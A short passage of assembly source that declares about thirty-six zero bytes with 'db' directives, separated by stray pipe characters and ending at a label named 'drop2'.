db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h
|
||
drop2: |